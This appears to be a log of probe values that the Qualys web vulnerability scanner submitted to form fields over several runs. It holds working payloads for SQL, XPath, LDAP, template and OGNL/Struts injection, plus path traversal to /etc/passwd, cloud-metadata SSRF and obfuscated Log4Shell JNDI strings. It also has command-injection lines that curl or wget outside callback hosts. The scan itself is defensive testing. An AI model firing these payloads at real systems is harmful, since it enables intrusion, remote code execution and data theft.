1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1" or not(false()) or "true" = "true
1
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1
1 or true() or 'and' = 'and'
1
1
1
1
1' or not(false()) or 'true' = 'true
15 oR 9=8 + 1
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
1
11 or 11=12
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1
1' and 'tpklq'='xqlkp
1' or 'tpklq'='tpklq
1
1
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1') or 'swqtp'='swqtp
1 aND 7248=2491 + 4757
1
1
1 and 7248 IS NULL
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1
1
1 or 6248 IS NULL
1 or NULL IS NULL
1 /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728
1
1
1
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1 or 4325=4325 --
1' /* or __Q_1__ */aND 3789=2398 + 1390 -- oR 1391
1
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1' and 3789=1391 --
1' or 3789=3789 --
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl fd0d5d63fc7be1472de7e7b83e31b661a476dd3f.17593256393642422.1155378690.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 9e433b317065058891ed922b36cc12760a869bce.17593256393642422.427096958.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 925c80dc9c34d50a2adb3efc8227e5a1ba6a1350.17593256393642422.3289925868.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl c6df5d2c585133abc0bc2040e61c34536018b3ce.17593256393642422.2786783693.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 13f6563e17d6a0cb3ff351b71cb9d043cf88e3a4.17593256393642422.863502922.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","4af543af8c929a85c44abac788875ac4a4c6451b.17593256393642422.3154127050.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://7fe08e09eeb479777423633223e00fa75a286e52.17593256393642422.149613318.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://19ff11b5090ccd428093e3abb370497bb474e512.17593256393642422.224874868.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//5f15491d44ace32e5f331fa4f2d04dbc89f5082d.17593256393642422.1871485221.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://fad95902fcdf39aa74f0c7bfc0819ed4c610d299.17593256393642422.3076235771.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//9fe8bb77c38328d7648a956712590c6dc5f7f14c.17593256393642422.2674234334.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://4df3ce6926b316b13a8dd3892b3cbb4089870657.17593256393642422.1567297449.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//001239249779d2df451919a1fd7673fce07380c7.17593256393642422.550541142.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://72f8e18e58107d8153b2862d4c6837407ae3c46f.17593256393642422.1837792367.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://ca1df74d683e497425de0b62eb98836914cd3454.17593256393642422.1896238222.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://e69b60d1b603b89ee6014fcee6c0956a61228775.17593256393642422.1047491359.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://f0bbe15e888ee866144f2b418b651d92653d290b.17593256393642422.2691620277.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
e293112f1ca3bb86e83b0d1fb363a6cfce6ed5d1.17593256393642422.2321862435.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://97819d63f95ed61a9d14f8d8af3a6bbdb7550c6d.17593256393642422.1725710616.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@9ada5f3b829962a5ae74f303040d97a3ce5c8f56.17593256393642422.3372098628.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1)(attribute2=*)
1
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
function(){qxssTUV8Xtom};
1
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssoVI88783()-"
1
'-qxss4n8VvyMZ()-'
1
*/;(function(){qxssd5MB8x9n});/*
1
9 ;(function(){qxssuqhYud32});//
1
9;(function(){qxssk00I85G7});//
1
';(function(){qxsswZ3xDzx4});/**/'
1
qualys(aqxss2tBFoify)xyz
1
");(function(){qxssY5k1BM85});/**/"
1
";(function(){qxss2GsLsc0P});/**/"
1
javascript:qxss(X169181732Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssb4F608jX=7< /script>
1
" onEvent=X169181732Y1_2Z
1
' onEvent=X169181732Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssieYNYy1y=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(2W9eyGdd)
1
_q=random(X169181732Y1_2Z)
1
_q=random(X169181732Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X169181732Y1_2Z);
1
" onEvent=X169181732Y1_2Z
1
' onEvent=X169181732Y1_2Z
1
_q=random(X169181732Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1
1" or true() or "and" = "and
1
1
1 or not(false()) or 'true' = 'true'
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
11 or 11=11
1
1
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1' and 'tpklq'='xqlkp
1' or 'tpklq'='tpklq
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1
1
1 oR 6248=2491 + 3757
1
1 /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728
1 or 6248 IS NULL
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1
1
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1' and 3789=1391 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1' or 3789=3789 --
1
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 4ee91f433f099477c0267778a033a51cbd18b31d.17553920393642422.1207987246.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget a93b49a1c488801979398169eb677174329765bf.17553920393642422.513281923.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 0476d838259f44ea286bad3af09d1e3dbbad551a.17553920393642422.1510613269.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl e03cb00646acf19360ebe8494bace273fb375350.17553920393642422.3089244358.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
@pd.core.frame.com.builtins.__import__("os").system("""curl 151d4edd2b72ed97d130d5e3766b48cb15443746.17553920393642422.2896637147.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","844d068f9c888b3b429a8d04057e5d0d796d794b.17553920393642422.4244354502.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://929474db22bc89a20beb6d9bdbafe355bb3f6ec0.17553920393642422.1841701943.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://ceb3ae7ea644e41541e29e37c0dec1ccc1616e34.17553920393642422.585425162.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//734d9423458aa950cc32e9031fdc847dfbda021e.17553920393642422.3606844870.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://bb7f9112c13f6580db2f9485e4cff64078b828bb.17553920393642422.2291539686.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//67878ce74e320685070c8b6869fcc89f20da385e.17553920393642422.2428626339.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://5c54a6f4401d681368080519346de83a22710cbb.17553920393642422.638699840.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//42713f9d6ae63799624aa2636e43c61c88d81a05.17553920393642422.256677999.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://a6089796e897990701a3d1c621858bce0bb6ced1.17553920393642422.3793425137.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://a4ce7f0b774688d51e6e68dc75611deb4e9191f5.17553920393642422.924040766.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
${jndi:rmi://8e3a797ae90baf987fe565c185164cfae447fb9f.17553920393642422.356209289.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${jndi:ldap://75c6a565d056f4b860ac3901d9e3bc14c138730c.17553920393642422.2906290265.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
4756f6ee4dff27f56d26f8315eeba5a656e077fd.17553920393642422.375231668.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://ee5791121094a285da3818ca836a8169a5af0cc1.17553920393642422.3424643193.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@5792b20bb38de796ee48356ee301e5e01986db79.17553920393642422.2139383106.smtphi01.smtp.eu2.qualysperiscope.com.
1)(|(uidNumber=*)
1
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
http://169.254.169.254/latest/meta-data/
1
1
function(){qxssS559cN3G};
1
qualyswas:
1
(23.0231*213.759)
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
!@#$%^&*()1
1
1
1!@#$%^&*()
1
1
1
"-qxss820rBsj0()-"
1
'-qxssiHx9bUX8()-'
1
*/;(function(){qxss89G6IzW2});/*
1
9 ;(function(){qxssm3uY3qFc});//
1
9;(function(){qxssr9oR7sGL});//
1
';(function(){qxss729Pwgd0});/**/'
1
qualys(aqxsshkrWC86I)xyz
1
");(function(){qxssJPHzI7YJ});/**/"
1
";(function(){qxss7cqDGzh8});/**/"
1
javascript:qxss(X175227292Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
//....//....//....//....//....//....//....//etc/passwd
1
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
q Qualys_resp_hdr_injection: Vulnerable
1
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssIfWy0f1r=7< /script>
1
" onEvent=X175227292Y1_2Z
1
' onEvent=X175227292Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssIdxV663M=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(wXrbq60T)
_q=random(X175227292Y1_2Z)
1
1
_q=random(X175227292Y1_2Z)
"'>
1
1
z-->
1
1"'>
1
">
1
javascript:qxss(X175227292Y1_2Z);
" onEvent=X175227292Y1_2Z
1
1
' onEvent=X175227292Y1_2Z
1
_q=random(X175227292Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1
1
1' or not(false()) or 'true' = 'true
1' and false() and 'or' = 'and
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
1
11 or 11=12
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1
1' and 'tpklq'='xqlkp
1' or 'tpklq'='tpklq
1
1
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1') and 'swqtp'='ptqws
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1
1 and 7248 IS NULL
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1 or NULL IS NULL
1 /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728
1
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1
1
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1' and 3789=1391 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1' or 3789=3789 --
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 5631a6ac1f4d8cab20914c40676c04bfb51dd122.17527257393642422.2003698018.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 7b778aefaee9bc2840b76c1b8f98c1c7bf84075f.17527257393642422.1821081203.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 39ee73680700e8ae44c8e6798557ef91be537025.17527257393642422.3896839676.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 469f8f5bf6943ccb0c9aa2f93418dca4872fb79a.17527257393642422.4050451133.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 37c87ea93f6076aae7ade213674069a9f06febb4.17527257393642422.4160182731.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","b597926970185159c19d0c9f7664f8529e362ad8.17527257393642422.2994811657.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://fb1dd96ff1d899d9c7b1b3a41fe0a3715168fc85.17527257393642422.2183051048.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://9e42f5352c9b26adab47839d590c8e6c20428d59.17527257393642422.1774974467.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//a83c353f6859be413932859f4fedf82b85b83736.17527257393642422.2522522038.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
